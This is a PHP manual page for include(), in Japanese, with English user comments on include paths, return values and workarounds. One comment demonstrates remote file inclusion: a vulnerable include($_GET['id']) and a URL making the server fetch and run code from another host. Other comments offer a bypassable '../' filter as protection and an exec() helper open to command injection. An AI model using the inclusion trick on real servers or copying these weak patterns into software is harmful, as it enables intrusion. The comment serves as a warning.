well, im using "realpath" on each include i make.
http://www.php.net/realpath
this function rewrites relative paths and symbolic links:
<?php
include(realpath('../../../test.php'));
?>
include()文は指定されたファイルを読み込み、評価します。
以下の記述内容はrequire()にも当てはまります。これら2つの構文は、 エラーの扱い方を除けば全く同様に振舞います。エラーが発生するとどちらも Warning を出力しますが、 require() を使用している場合は Fatal Errorとなります。 言い換えると、指定されたファイルが無い場合に処理を停止したい場合は require()を使用した方が良い、ということになります。 include()を使用すると、読み込むべきファイルが存在しない 場合も処理が続行されます。include_path を適切に設定することも忘れないでください。 PHP 4.3.5 より前のバージョンでは include されたファイルにパースエラーが あっても処理が続行されましたが、それ以降のバージョンでは処理を停止します。
読み込むファイルはまずカレントのワーキングディレクトリからの相対パスとしてinclude_path で探され、それから、カレントのスクリプトのディレクトリからの相対パスとしてinclude_path で探されます。 例えば、include_pathが librariesで、カレントの ワーキングディレクトリが /www/ の 場合、include/a.php を読み込んで、そのファイルの中に include "b.php" と書いてあったとすると、 b.php がまず /www/librariesで探され、その後、 /www/include/で探されます。 ファイル名が ./ あるいは ../ で始まっている場合は、 カレントのワーキングディレクトリからの相対パスとしてinclude_path で探されるのみとなります。
ファイルが読み込まれるとそのファイルに含まれるコードは、 include()もしくはrequire()が実行された 行の変数スコープを継承します。 呼び出し側の行で利用可能である全ての変数は、読み込まれたファイル内で利用可能です。 しかし、読み込まれたファイル内で定義されている関数やクラスはすべて グローバルスコープとなります。
例 16.5. 基本的なinclude()の例
vars.php
<?php
$color = 'green';
$fruit = 'apple';
?>
test.php
<?php
echo "A $color $fruit"; // A
include 'vars.php';
echo "A $color $fruit"; // A green apple
?>
呼び出し側のファイルの関数定義の中で読み込みが行われ場合は、読み込まれる ファイルに含まれる全てのコードは、その関数内で定義されているものとして 動作します。従って変数スコープのその関数のものが継承されます。
例 16.6. 関数内での読み込み
<?php
function foo()
{
global $color;
include 'vars.php';
echo "A $color $fruit";
}
/* vars.php は foo() のスコープを継承するため *
* $fruit はこの関数の外では無効となります。 *
* $color はglobalとして宣言されているため *
* 有効です。 */
foo(); // A green apple
echo "A $color $fruit"; // A green
?>
ファイルが読み込まれるときには、読み込まれるファイルの先頭で PHPモードを抜けてHTMLモードになり、最後に再びPHPモードに戻ります。 このため、読み込むファイル中のPHPコードとして実行する必要がある コードは、 有効なPHPの開始タグおよび終了タグで括る必要があります。
"URL fopenラッパー"が 有効になっている場合(デフォルト設定では有効です)、ローカルなパス名 の代わりにURL(HTTP経由)を用いて読み込むファイルを指定することが可能です。 URLで指定されたサーバがファイルをPHPコードとして解釈することが 出来る場合には、HTTP GETを使用してURLリクエストに引数を指定することが 出来ます。これはファイルの読み込み云々やスコープの継承とは関係なく、 ただ単純にスクリプトがリモートのサーバで実行されて結果がローカルの スクリプトに読み込まれる、というだけのことです。
警告
PHP 4.3.0 より前のバージョンの Windows 版 PHP は、現在この関数に関してリモートファイルアクセス機能を サポートしていません。これは、allow_url_fopen を 有効にした場合でも同様です。
例 16.7. HTTP経由のinclude()
<?php
/* この例は www.example.com が.phpはPHPスクリプトとして扱い、.txtは通常の *
* ファイルとして扱うように設定されていると仮定しています。また、ここでの *
* '動作します'という言葉の意味は、変数$fooと$barが読み込まれる側のファイ *
* ルで使用可能である、ということです。 */
// 動作しません: www.example.com では file.txt はPHPコードとして解釈されません。
include 'http://www.example.com/file.txt?foo=1&bar=2';
// 動作しません: 'file.php?foo=1&bar=2' という名前のファイルをローカルファイル
// システム上から探し出そうとします。
include 'file.php?foo=1&bar=2';
// 動作します。
include 'http://www.example.com/file.php?foo=1&bar=2';
$foo = 1;
$bar = 2;
include 'file.txt'; // 動作する
include 'file.php'; // 動作する
?>
セキュリティの警告
リモートファイルはリモートサーバ上で実行されます(ファイルの拡張子や リモートサーバが PHP の実行を許可しているかどうかに依存します)が、 有効な PHP スクリプトである必要があります。なぜならそれはローカル サーバ上で処理されるからです。もしリモートサーバ上で処理された結果が ほしいだけならば、readfile() を使用するほうがよい でしょう。そうでなければ、リモートスクリプトが有効な期待通りのコードを 生成していることを確認するため、注意を払うことが必要になります。
リモートファイル, fopen(), file()も参照してください。
値の返し方: 読み込まれたファイル内では、ファイルの実行処理を終了し呼出側の スクリプトに戻るためにreturn()文を実行することが可能です。 読み込まれたファイルから値を返すことも可能です。 通常の関数で行うのと同様にincludeコールの値を取得することができます。 しかし、読み込まれたリモートファイル(ローカルファイルの場合も同様)の出力が、 有効なPHPの開始/ 終了タグを有していない限り、リモートファイルを読み込む際に値を 取得することはできません。 必要な変数をこれらのタグの中で宣言することができ、これらの変数は ファイルが読み込まれた位置で使用可能となります。
include() は特別な言語構造であるため、 引数の前後に括弧は不要です。 返り値を比較する際には注意してください。
例 16.8. インクルードの戻り値を比較する
<?php
// won't work, evaluated as include(('vars.php') == 'OK'), i.e. include('')
if (include('vars.php') == 'OK') {
echo 'OK';
}
// works
if ((include 'vars.php') == 'OK') {
echo 'OK';
}
?>
注意: PHP 3では関数ブロック以外のブロック内でreturnを 使用することはできません。 return()が適用されるのは関数であり、ファイル全体ではありません。
例 16.9. include()とreturn()文
return.php
<?php
$var = 'PHP';
return $var;
?>
noreturn.php
<?php
$var = 'PHP';
?>
testreturns.php
<?php
$foo = include 'return.php';
echo $foo; // 'PHP'と出力されます
$bar = include 'noreturn.php';
echo $bar; // 1が出力されます
?>
読み込みが成功すると$barの値は1となります。上の2つの例の違いに 注目してください。最初の例では読み込まれるファイル側でreturn() を使用し、もう一方では使用していません。 ファイルが読み込めなかった場合、FALSE が返され、 E_WARNING が発生します。
読み込まれるファイルで定義された関数がある場合、 これらは、return()の前後によらず メインファイルで使用できます。 このファイルが二度読み込まれた場合、PHP 5は関数が定義済みであるため 致命的なエラーを発生します。一方、PHP 4は return()の後に定義された関数については、 エラーを発生しません。 ファイルが読み込み済みであるかどうかを調べ、 読み込まれるファイルの内容を条件分岐で返すかわりに include_once()を使用することを推奨します。
PHP ファイルの内容を変数に "include する" もうひとつの方法は、 出力制御関数 を include() とともに用いて 出力をキャプチャすることです。たとえば、
例 16.10. 出力バッファリングを用い、 PHP ファイルの内容を文字列として読み込む
<?php
$string = get_include_contents('somefile.php');
function get_include_contents($filename) {
if (is_file($filename)) {
ob_start();
include $filename;
$contents = ob_get_contents();
ob_end_clean();
return $contents;
}
return false;
}
?>
スクリプト中で自動的にファイルをインクルードするには、php.ini の auto_prepend_file および auto_append_file オプションも参照ください。
注意: これは、関数ではなく 言語構造のため、可変関数 を用いて コールすることはできません。
require(), require_once(), include_once(), get_included_files(), readfile(), virtual() および include_path も参照ください。
include
rayro at gmx dot de
22-Aug-2007 06:48
22-Aug-2007 06:48
eeckart at gmail dot com
17-Aug-2007 01:17
17-Aug-2007 01:17
In reference to the fopen() and $use_include_path workaround for checking whether a include file exists as posted by [arnold at bean-it dot nl]...
I did some benchmarks with 100 dirs (each with 1 file) in the include_path on Apache/2.0.55 (Win32) PHP/5.2.1.
Here are the results:
(note: in the success scenarios, I am include'ing the file in the LAST directory on the include stack. This is to maximize the seek time; fail scenarios simply use a non-existent file; all times are in seconds )
benchmarks --> plain vanilla INCLUDE
(success)
0.05515718460083
0.054859161376953
0.053768157958984
(fail)
0.22402501106262
0.17378783226013
0.14510798454285
benchmarks --> fopen() and $use_include_path workaround
(success)
0.060588836669922
0.069549798965454
0.056423902511597
(fail)
0.05295991897583
0.039775133132935
0.054499864578247
>>> CONCLUSION
In cases involving MANY include paths, include() is -marginally- faster than the workaround (unsurprising - we incur the extra overhead of BOTH the fopen() call AND the $use_include_path seek). I say marginal in comparison to the "fail" scenarios, detailed next..
The most surprising thing is the inefficiency of include() when you are trying for a non-existent file. As compared to the workaround, the native include() method is roughly 3 times slower.
Based on additional tests (50 paths only), I note that any decrease in seek time for either case is generally linear to the number of paths.
---
THEREFORE, depending on the amount of paths you have, you might want to resort to different methods of optimizing the includes in your scripts, especially if you need to constantly test for the existence of include'd files (our organization uses a templating engine that relies on a virtual flat directory structure using the set_include_path() function).
---
From a technical perspective, I have no idea why this is the case and I find the prospect of trawling the PHP source to be rather daunting. However, as an educated guess: I figure that the include() code assumes the file exists, and so wastes processor cycles making a system read call, which inevitably fails.
For those interested in the benchmark script, you can email me at the email address provided above. No support, of course. :P
tim furry
10-Aug-2007 12:09
10-Aug-2007 12:09
A small tweak to alex's getFilePath function allows it to work for Windows-based PHP as well:
<?php
$absPath = str_replace("\\", "/", dirname($_SERVER['SCRIPT_FILENAME']));
?>
Windows recognizes a forward slash as a directory separator character.
Using $_SERVER['DOCUMENT_ROOT'] and similar solutions didn't seem to work for web paths with internal symbolic links. Alex's function gets around that and works great.
alex carstea
27-Jul-2007 12:07
27-Jul-2007 12:07
Since include() caused me many problems when i was trying to test my code, I wrote a small function. It receives as parameter the path to the file to include relative to the current file. The format similar to :
"../../path/FileName.php"
The function returns the absolute path to the file to be included. This path can be used as argument to include() and resolves the problem of nested inclusions.
<?php
function getFilePath($relativePath){
$absPath=dirname($_SERVER['SCRIPT_FILENAME']);
$relativeArray=explode("/",$relativePath);
$absArray=explode("/",$absPath);
$upTokens=0;
//count the number of ".." tokens that precede the path
while(( $upTokens<count($relativeArray)) and ($relativeArray[$upTokens]=="..")) {
$upTokens++;
}
// create the absolute path
$filePath=$absArray[0];
for ($i=1; $i< (count($absArray)-$upTokens);$i++) {
$filePath.="/".$absArray[$i];
}
for ($i=$upTokens; $i< count($relativeArray);$i++){
$filePath.="/".$relativeArray[$i];
}
return $filePath;
}
?>
Hope you will find it usefull....
Alex
Cory Gagliardi
26-Jul-2007 03:22
26-Jul-2007 03:22
Easy way to set $_GET values for local includes.
This is an easy way to make up fake URLs for SEO purposes that are really just running other PHP pages with special $_GET values.
This will NOT work:
<?PHP
include('communities.php?show=gated&where=naples');
?>
However, this will:
<?PHP
$_GET = array();
$_GET['show'] = 'gated';
$_GET['where'] = 'naples';
include('communities.php');
?>
Putting this on your page and nothing else will give the same result as going to
'communities.php?show=gated&where=naples'
but the URL can be whatever you want it to be.
php_notes (at) megaphone . ch
20-Jul-2007 08:28
20-Jul-2007 08:28
If you use php >5.2, don't forget to set up the allow_url_include parameter in php.ini file .. If not you can search a long long long long time after this like-a-bug problem ;)
http://www.php.net/manual/en/ini.php
none
18-Jul-2007 06:09
18-Jul-2007 06:09
If you want to include a file that has no PHP in it (such as a template), it is more efficient to use file_get_contents().
Instead of:
include "file.htm";
use:
echo file_get_contents("file.htm");
In a rough millisecond test using gettimeofday(), it proved to be about twice as fast.
adam at adamleayr dot id dot au
03-Jul-2007 09:22
03-Jul-2007 09:22
In response to oasis1 below, I use mod_rewrite to pipe all my requests through the index.php file, so I'm able to use the below code to find the root directory:
$sRoot = $_SERVER['HTTP_HOST'] . dirname($_SERVER['SCRIPT_NAME']);
You may be able to modify it to suit yourself.
oasis1 at geocities dot com
30-Jun-2007 12:11
30-Jun-2007 12:11
What a pain! I have struggled with including files from various subdirectories. My server doesn't support an easy way to get to the root HTML directory so this is what I came up with:
<?php
$times = substr_count($_SERVER['PHP_SELF'],"/");
$rootaccess = "";
$i = 1;
while ($i < $times) {
$rootaccess .= "../";
$i++;
}
include ($rootaccess."foo/bar.php");
?>
This will give you what it takes to get to the root directory, regardless of how many subdirectories you have traveled through.
post-nospam at brucemiller dot co dot uk
04-Jun-2007 06:07
04-Jun-2007 06:07
A very EASY way to get 'include' to find its way to another directory, other than setting the 'include path', and useful for fetching one or two files:
include ($_SERVER['DOCUMENT_ROOT']."/foo/bar.php");
This creates an include that is relative to the root rather than the current directory.
The dot is for concatenation, not current directory, as with 'include path' syntax.
See Appendix M of Manual > Reserved words > Predefined Variables, for more info on $SERVER.
safak_ozpinar at NOSPAM dot yahoo dot com
02-Jun-2007 10:18
02-Jun-2007 10:18
This is a good example for returning a value from an included file I think.
I'm working on my own template class like Smarty. This class gets html code from template files. Then it creates a file that will be included directly. It displays only installed modules for the page. The included page always checks the installed modules. If the comparision returns false, the included file returns FALSE and warns the class to recreate itself. Then a new file with requested modules will be overwritten to the existing one.
Here is the main framework of my class:
<?php
/* by Safak Ozpinar */
class MyInclude {
private $modules = array();
private $numModules = 0;
/* the constructor gets module names into an array */
function MyInclude($inputModules) {
if(!is_array($inputModules)) $inputModules = array($inputModules);
foreach($inputModules as $module) {
$this->modules[$this->numModules] = $module;
$this->numModules++;
}
}
/* the main action happens here, check carefully */
function Display($fname, $reCreate = FALSE) {
if(@file_exists($fname) && !$reCreate) {
// if the included file returns FALSE, recreate it
if((include $fname)==FALSE) {
$this->Display($fname, TRUE);
return;
}
}
else {
$this->Create($fname);
include($fname);
}
}
/* the behavior of the method Create depends on the format of your template file */
// you will need some changes on this method to adapt to your work
private function Create($fname) {
$contentsPHP = '<?'."\n";
$contentsHTML = '<html><body>'."\n";
foreach($this->modules as $module) {
$contentsPHP .= '$storedModules[] = \''.$module.'\';'."\n";
// the html code of the module (you may need to take from a tempate file)
$contentsHTML .= '<p>HTML code for module <b>"'.$module.'"</b></p>'."\n";
}
// here is the comparision code for included file
// if the comparision returns FALSE, the file also returns FALSE
$contentsPHP .= 'if(!$this->Compare($storedModules)) return FALSE;'."\n";
$contentsPHP .= '?>'."\n";
$contentsHTML .= '</body></html>';
$fp = fopen($fname,'wb');
fwrite($fp, $contentsPHP.$contentsHTML);
fclose($fp);
}
/* ordered comparision, you may want to change the operations in this method */
function Compare($storedModules) {
$count = count($storedModules);
if($count == $this->numModules) {
for($i=0; $i<$count; $i++) {
if(strcmp($storedModules[$i],$this->modules[$i])!=0)
return FALSE;
}
return TRUE;
}
else return FALSE;
}
}
/* lets go */
$tpl = new MyInclude(array('headline','main_menu','sub_menu','text_ads'));
$tpl->Display('inc.php');
?>
I haven't written error controls here because the code would be too large. For instance; if a html template for requested modules doesn't exist, you may want to display an error message or make some operations.
---
Safak Ozpinar (from Istanbul University)
user at example.com
21-May-2007 12:38
21-May-2007 12:38
Regarding the caching of includes.
I submitted a bug for this, apparently it's not a bug it's supposed to work that way for some reason.
The bugs team declined to elaborate as to why but it would seem includes aren't meant to use dynamic code, which makes this function worthless and by extension makes php needlessly time consuming because you can't reuse files properly.
treyh at wilnet1 dot com
17-May-2007 11:26
17-May-2007 11:26
I needed to use an include with an echo statement, with http authenication so I thought I'd share. It's basic but I didn't find it documented anywhere:
include 'http://treyh:pass@192.168.0.60/update2_count3.php?data=' . $row[id];
14-May-2007 12:40
Even when you set cache control and expiry headers:
header("Expires: 0");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("cache-control: no-store, no-cache, must-revalidate");
header("Pragma: no-cache");
It doesn't seem to reparse the include on the second hit to the page without a forced refresh.
e.g. a page where you direct to a login page which changes a $_SESSION var then returns to the originating page.
The originating page doesn't execute the code so it looks like still not logged in.
cmedina at bluecorestudio dot com
01-May-2007 02:03
01-May-2007 02:03
I wanted that included files behave like in C/C++ and this was killing me. So I created this function that really helped me (Note: You should add these lines to EVERY included file).
Code Lines:
<?
$FILE_PATH = preg_replace_callback(
'/(.*)(\\\?.*?)\s*;\1(\\\?.*?)\s*$/',
create_function(
'$matches',
'$path = str_replace("\\\", "/",(isset($matches[2])?
preg_replace(
\'/(?:^\/|^\\\\\)?[^\/\\\\\]+(?:\/|\\\\\)?/\',
"../",$matches[2]):"./").
(isset($matches[3])?$matches[3]:""));
return !empty($path)? "$path/" : "./";'
)
,realpath("./").";".dirname(__FILE__)
);
?>
Usage Example:
Files hierarchy for example
/www/file.php
/include/secondfile.php
/include/test/anotherfile
<? //file.php
//i will not include the code lines in example to avoid repetition but you have to
// --- FILE_PATH code lines here ---
// include the file relative to the caller position remember to use a relative path from each file to desired file
include ($FILE_PATH . "../../include/secondfile.php");
?>
<? //secondfile.php
// --- FILE_PATH code lines here ---
//note that path used is in reference to secondfile.php's path and not the original caller's(file.php) path
include ($FILE_PATH . "test/anotherfile"); //or include ($FILE_PATH . "./test/anotherfile");
?>
<? //anotherfile
/* --- some mixed content here --- */
?>
Now you can do recursive includes to files inside already
included files using each file's path as reference, like in
c/c++!!!
I'd tested this just in WINXP (PHP Version 4.4.1), so, I
dont know how it behaves in other OS/PHP-Versions. Any
additional suggestions or bugs, please let me know.
gabriel at bumpt dot net
10-Mar-2007 12:36
10-Mar-2007 12:36
In response to baofu:
The problem with calling:
set_include_path( ... )
before including any file, is that if one of the included files, in turn, does a set_include_path to include yet another bunch of files, then the following include statement in your topmost file, is done in an include path context that has changed.
Using: include dirname(__FILE__).'/../foo/bar' remains the best solution.
Khaos
24-Feb-2007 04:43
24-Feb-2007 04:43
This might help a bit for security (no guarantees).
Instead of
include $page;
put
include str_replace('../', '', './' . $page);
-hh-
23-Feb-2007 08:47
23-Feb-2007 08:47
coldflame,
<?=$foo?> equals <? print $foo ?>
If 1 is not needed at the end, just use <? include($filename) ?> without the equal sign.
anon
13-Feb-2007 10:49
13-Feb-2007 10:49
Be careful using the <?= / ?> start and end tags with include / require.
A lovely feature/bug/misunderstanding meant that the result of
<?=include(filename)?>
was to get the contents of the file, suffixed with a '1'. I can only assume that the one is the return code of the include.
hopefully my pain can help somebody else :D
cheers,
coldflame
mbread at m-bread dot com
11-Feb-2007 02:23
11-Feb-2007 02:23
If you have a problem with "Permission denied" errors (or other permissions problems) when including files, check:
1) That the file you are trying to include has the appropriate "r" (read) permission set, and
2) That all the directories that are ancestors of the included file, but not of the script including the file, have the appropriate "x" (execute/search) permission set.
baofu
03-Feb-2007 12:22
03-Feb-2007 12:22
you can also use the following before you include any files.
set_include_path(dirname(__FILE__))
Nathan Ostgard
20-Jan-2007 07:32
20-Jan-2007 07:32
You can also use debug_backtrace to write a function that do the chdir automatically:
<?php
function include_relative($file)
{
$bt = debug_backtrace();
$old = getcwd();
chdir(dirname($bt[0]['file']));
include($file);
chdir($old);
}
?>
anonymous
19-Jan-2007 06:49
19-Jan-2007 06:49
When I'm dealing with a package that uses relative includes of its own, rather than modify all of their includes, I found it was easier to change PHP's working directory before and after the include, like so:
<?
$wd_was = getcwd();
chdir("/path/to/included/app");
include("mainfile.php");
chdir($wd_was);
?>
This way neither my includes nor theirs are affected; they all work as expected.
dionyziz at deviantart dot com
19-Jan-2007 01:06
19-Jan-2007 01:06
In reply to the last anonymous note, this is exactly the way mediawiki code handles this problem. They have various-depth include paths.
So, for instance, inside includes/normal/UtfNormal.php (as of revision 19455) they do:
<?php
require_once dirname(__FILE__).'/UtfNormalUtil.php';
?>
...to include the file includes/normal/UtfNormal.php.
vahe dot ayvazyan at googlemail dot com
10-Jan-2007 08:12
10-Jan-2007 08:12
If you want the "include" function to work correctly with paths and GET parameters, try the following code:
<?php
$_GET['param1'] = 'param1value';
$_GET['param2'] = 'param2value';
@include($_SERVER['DOCUMENT_ROOT'] . "/path1/path2/include.php");
?>
Then within your "include.php" use $_GET['param1'] and $_GET['param2'] to access values of parameters.
I spent several hours to figure this out.
anonymous
01-Jan-2007 11:42
01-Jan-2007 11:42
I'm gonna throw my hat in the rink and also say that I've always thought that the include path being relative to the current directory is silly. PHP is the only language I can think of that does this. Almost all of my include paths have always had to be prefixed with <?php dirname(__FILE__) ?> to operate expectedly.
Nathan Ostgard
29-Dec-2006 04:27
29-Dec-2006 04:27
I have to agree with sean dot farrell at digital-egg dot org.
If I put "../" or "./" in a call to include(), I expect it to be relative to the file I am including from, not the current working directory of the application.
This backwards mentality for relative paths really interferes with PHP's ability to build packages of files independent of an application.
sean dot farrell at digital-egg dot org
29-Nov-2006 11:12
29-Nov-2006 11:12
The way PHP handles the ./ and ../ is totally counter intuitive. As said if the included file is preceded by a ./ and ../ it looked up from the current working directory. And that is defined by the of the EXECUTED script. That is the script that you specified in the url.
So if your have a.php that includes include/b.php that includes ../extern/c.php, it will not do what you want. You can use extern/c.php instead if you never execute outside of the document root. For me that just will not cut it. Since I execute test suites if files are directly called, like in python.
Here is my dirty trick that works, since I only have two levels of file hierarchy:
set_include_path("../:./");
require_once("extern/c.php");
And here is an open question: Why are the included files not looked up relative from the file that includes them and then in the include path? This would be a behavior like in all other languages.
rickkyREMOVETHIS at gmail dot com
17-Nov-2006 06:03
17-Nov-2006 06:03
In response to http://uk.php.net/manual/en/function.include.php#38000
Using the following at the top of your CLI scripts will make includes work similar to web PHP.
#!/usr/bin/php
<?php chdir(dirname(__FILE__)); ?>
This changes the current working directory to the one your script is running in. Its quite used for taking existing web scripts and getting them to run quickly in the command line.
Janci
17-Nov-2006 12:59
17-Nov-2006 12:59
Please note that althought you can call a function that is DEFINED later in the code, you cannot call a function that is defined in a file which is INCLUDED later. Consider following two examples:
Example 1:
<?php
test();
function test()
{
echo 'In test.';
}
?>
Example 2:
file1.php:
<?
test();
include 'file2.php';
?>
file2.php:
<?
function test()
{
echo 'In test.';
}
?>
Please be aware that while the first example will work as expected, the second one will generate a fatal error "Call to undefined function: test() ...". The same is true for the require.
nospam at nospam dot com
14-Aug-2006 09:28
14-Aug-2006 09:28
Trick to get around including get method...
Since this doesn't work:
include('page.php?id=1');
Try this:
$_REQUEST['id'] = 1;
include('page.php');
mlindal at pfc dot forestry dot ca
09-Aug-2006 12:33
09-Aug-2006 12:33
If a person directly accesses an include file by mistake, you may want to forward them to a correct default page.
Do this by:
Say the file to be included is 'newpubs.php'
and the main pages are either newpubs_e.php or newpubs_f.php
if($_SERVER[PHP_SELF]=="/newpubs.php")
{
header("Location: newpubs_e.php");
exit;
}
Will send them to newpubs_e.php if they try to access newpubs.php directly.
medhefgo at googlemail dot com
27-May-2006 08:50
27-May-2006 08:50
Because there is no quick way to check if a file is in include_path, I've made this function:
<?php
function is_includeable($filename, $returnpaths = false) {
$include_paths = explode(PATH_SEPARATOR, ini_get('include_path'));
foreach ($include_paths as $path) {
$include = $path.DIRECTORY_SEPARATOR.$filename;
if (is_file($include) && is_readable($include)) {
if ($returnpaths == true) {
$includable_paths[] = $path;
} else {
return true;
}
}
}
return (isset($includeable_paths) && $returnpaths == true) ? $includeable_paths : false;
}
?>
NOdasnipaSPAM
20-May-2006 06:40
20-May-2006 06:40
at spam guard dot gmail com
to php dot net at reinsveien dot com:
if you know the domain the file should be coming from then you can parse the variable for the domain and make sure that it matches the domain you expect, example:
<?php
$path="/full/path/to/script/";
if (getdomain($path) == 'yourdomain'){
include($path.'somefile.php');
}
?>
this should prevent remote execution of any malicious script
lholst+phpnet at students dot cs dot uu dot nl
09-May-2006 04:15
09-May-2006 04:15
What cavarlier refers to is that on some editors, UTF-8 files are prefixed with a BOM (Byte Order Mark), an invisible marker three bytes in size, which are output by PHP if it encouters them (which is before the <?php on the first line). Notepad is particularly notorious creating these.
However, any decent editor (e.g. Notepad2) can save UTF-8 files without BOM, and if you do that the first <?php tag will truly be on the first character of the file.
So this does not mean that UTF-8 cannot be used by PHP.
cavarlier [at] hotmail [dot] com
23-Apr-2006 04:59
23-Apr-2006 04:59
please note when you include a (utf-8) encoded file, this will be sufficient to send headers even if it doesnt contain any line breaks
arnold at bean-it dot nl
25-Feb-2006 07:15
25-Feb-2006 07:15
Currently there is no clean way to check if a file can be included. Simply including a file which can't be opened causes a warning to be triggered. Suppressing include() with an @ (as often seen below) is not advisable, since parse errors won't be displayed, but will cause the script to die, causing a blank screen. (Happy debugging, hope you're using ZendStudio or some other debugger).
The best solution I've come up with is:
<?php
if (($fp = @fopen($filename, 'r', 1)) and fclose($fp)) include $filename;
?>
I believe the functions file_exists(), filesize(), is_readable() and is_writable() should have an use_include_path just like fopen().
If you agree with this, please PLEASE VOTE on bug #6932 (http://bugs.php.net/bug.php?id=6932). This bug has been open for over 5 years. Apparently no one is willing to add this feature.
Stephen Lee
19-Jan-2006 09:36
19-Jan-2006 09:36
@ajsharp at gmail dot com
To find out which script has included another, use the Server Variable 'SCRIPT_NAME' (note: there are other server variables that also contain the script name, but I use this one simply because it works for me) e.g.
"variables.php"
<?php
$includer = basename($_SERVER['SCRIPT_NAME']);
switch ($includer) {
case 'a.php':
$this_variable = 'included by script a.php';
break;
case 'b.php':
$this_variable = 'included by script b.php';
break;
default:
$this_variable = 'included by unkown script';
}
echo $this_variable;
?>
Test with 3 different files "a.php", "b.php", "c.php", all with the same content:
<?php
include 'variables.php';
?>
stalker at ruun dot de
10-Jan-2006 09:55
10-Jan-2006 09:55
a simple function to recursively include e.g. the include-directory of your site and its subdirs:
<?php
function includeRecurse($dirName) {
if(!is_dir($dirName))
return false;
$dirHandle = opendir($dirName);
while(false !== ($incFile = readdir($dirHandle))) {
if($incFile != "."
&& $incFile != "..") {
if(is_file("$dirName/$incFile"))
include_once("$dirName/$incFile");
elseif(is_dir("$dirName/$incFile"))
includeRecurse("$dirName/$incFile");
}
}
closedir($dirHandle);
}
?>
php at bucksvsbytes dot com
04-Oct-2005 04:31
04-Oct-2005 04:31
The documentation should make it clearer that the include argument is not a site path (i.e. not relative to the document root or to any web server defined aliases), but rather a path on the host relative to the calling script's directory.
wamsleye at yahoo dot com
25-Aug-2005 06:21
25-Aug-2005 06:21
I had been looking around on how to make sure that a file is included, I guess the way to do it changed with new version, here we go:
<?php
if ((include "header.php") == true) {
echo ("header loaded");
}//end if
else{
echo("header not loaded");
}//end else
?>
hope that helps!
Jesper Juhl
15-Aug-2005 12:14
15-Aug-2005 12:14
If you want to prevent direct access to some files and only allow them to be used as include files by other scripts, then an easy way to accomplish that is to check a define in the include file.
Like this.
includefile.php
---
<?php
defined('_VALID_INCLUDE') or die('Direct access not allowed.');
/* rest of file */
?>
script.php
---
<?php
define('_VALID_INCLUDE', TRUE);
include('includefile.php');
/* rest of file */
?>
ignacio esviza
20-Jul-2005 06:10
20-Jul-2005 06:10
Hi, there...
I've use this in order to grab the output from an include() but without sending it to the buffer.
Headers are not sent neither.
<?php
function include2($file){
$buffer = ob_get_contents();
include $file;
$output = substr(ob_get_contents(),strlen($buffer));
ob_end_clean();
ob_start();
echo $buffer;
return $output;
}
?>
Ethilien
19-Jul-2005 04:04
19-Jul-2005 04:04
Another way of getting the proper include path relative to the current file, rather than the working directory is:
<?php
include realpath(dirname(__FILE__) . "/" . "relative_path");
?>
Berenguer Blasi
04-Jul-2005 10:07
04-Jul-2005 10:07
When working with a well organized project you may come across multiple problems when including, if your files are properly stored in some nice folders structure such as:
- src
- web
- bo
- lib
- test
- whatever
as the include path's behaviour is somehow strange.
The workaround I use is having a file (ex: SiteCfg.class.php) where you set all the include paths for your project such as:
$BASE_PATH = dirname(__FILE__);
$DEPENDS_PATH = ".;".$BASE_PATH;
$DEPENDS_PATH .= ";".$BASE_PATH."/lib";
$DEPENDS_PATH .= ";".$BASE_PATH."/test";
ini_set("include_path", ini_get("include_path").";".$DEPENDS_PATH);
Make all paths in this file relative to IT'S path. Later on you can import any file within those folders from wherever with inlude/_once, require/_once without worrying about their path.
Just cross fingers you have permissions to change the server's include path.
18-May-2005 12:10
Thought you can figure it out by reading the doc, this hint might save you some time. If you override include_path, be sure to include the current directory ( . ) in the path list, otherwise include("includes/a.php") will not search in the current script directory.
e.g :
if(file_exists("includes/a.php"))
include("includes/a.php")
The first line will test to true, however include will not find the file, and you'll get a "failed to open stream" error
php at REMOVEMEkennel17 dot co dot uk
03-May-2005 09:20
03-May-2005 09:20
As stated above, when using return() to terminate execution of an included file, any functions defined in the file will still be defined in the global scope, even if the return() occurs before their definition.
It should be noted that class definitions behave in the same way.
morris.php <A T> it-solutions.org
28-Apr-2005 09:31
28-Apr-2005 09:31
Something not previously stated here - but found elsewhere - is that if a file is included using a URL and it has a '.php' extension - the file is parsed by php - not just included as it would be if it were linked to locally.
This means the functions and (more importantly) classes included will NOT work.
for example:
include "http://MyServer.com/MyInclude.php";
would not give you access to any classes or functions within the MyInclude.php file.
to get access to the functions or classes you need to include the file with a different extension - such as '.inc' This way the php interpreter will not 'get in the way' and the text will be included normally.
gillis dot php at TAKETHISAWAY dot gillis dot fi
14-Apr-2005 06:47
14-Apr-2005 06:47
This is not directly linked to the include function itself. But i had a problem with dynamically generated include-files that could generate parse errors and cause the whole script to parse-error.
So as i could not find any ready solution for this problem i wrote the mini-function. It's not the most handsome solution, but it works for me.
<?php
function ChkInc($file){
if(substr(exec("php -l $file"), 0, 28) == "No syntax errors detected in"){
return true;
}else{
return false;
}
}
?>
if someone else has a better solution, do post it...
Note. remember that this function uses unchecked variables passed to exec, so don't use it for direct user input without improving it.
//Gillis Danielsen
dragon at wastelands dot net
10-Dec-2004 09:30
10-Dec-2004 09:30
The __FILE__ macro will give the full path and name of an included script when called from inside the script. E.g.
<? include("/different/root/script.php"); ?>
And this file contains:
<? echo __FILE__; ?>
The output is:
/different/root/script.php
Surprisingly useful :> Obviously something like dirname(__FILE__) works just fine.
mattcimino at gardiners dot com
11-Aug-2004 09:47
11-Aug-2004 09:47
To avoid painfully SLOW INCLUDES under IIS be sure to set "output_buffering = on" in php.ini. File includes dropped from about 2 seconds to 0 seconds when this was set.
durkboek A_T hotmail D_O_T com
03-Jun-2004 08:09
03-Jun-2004 08:09
I would like to emphasize the danger of remote includes. For example:
Suppose, we have a server A with Linux and PHP 4.3.0 or greater installed which has the file index.php with the following code:
<?php
// File: index.php
include ($_GET['id'].".php");
?>
This is, of course, not a very good way to program, but i actually found a program doing this.
Then, we hava a server B, also Linux with PHP installed, that has the file list.php with the following code:
<?php
// File: list.php
$output = "";
exec("ls -al",$output);
foreach($output as $line) {
echo $line . "<br>\n";
}
?>
If index.php on Server A is called like this: http://server_a/index.php?id=http://server_b/list
then Server B will execute list.php and Server A will include the output of Server B, a list of files.
But here's the trick: if Server B doesn't have PHP installed, it returns the file list.php to Server A, and Server A executes that file. Now we have a file listing of Server A!
I tried this on three different servers, and it allways worked.
This is only an example, but there have been hacks uploading files to servers etc.
So, allways be extremely carefull with remote includes.
marco_ at voxpopuli-forum dot net
13-Apr-2004 01:27
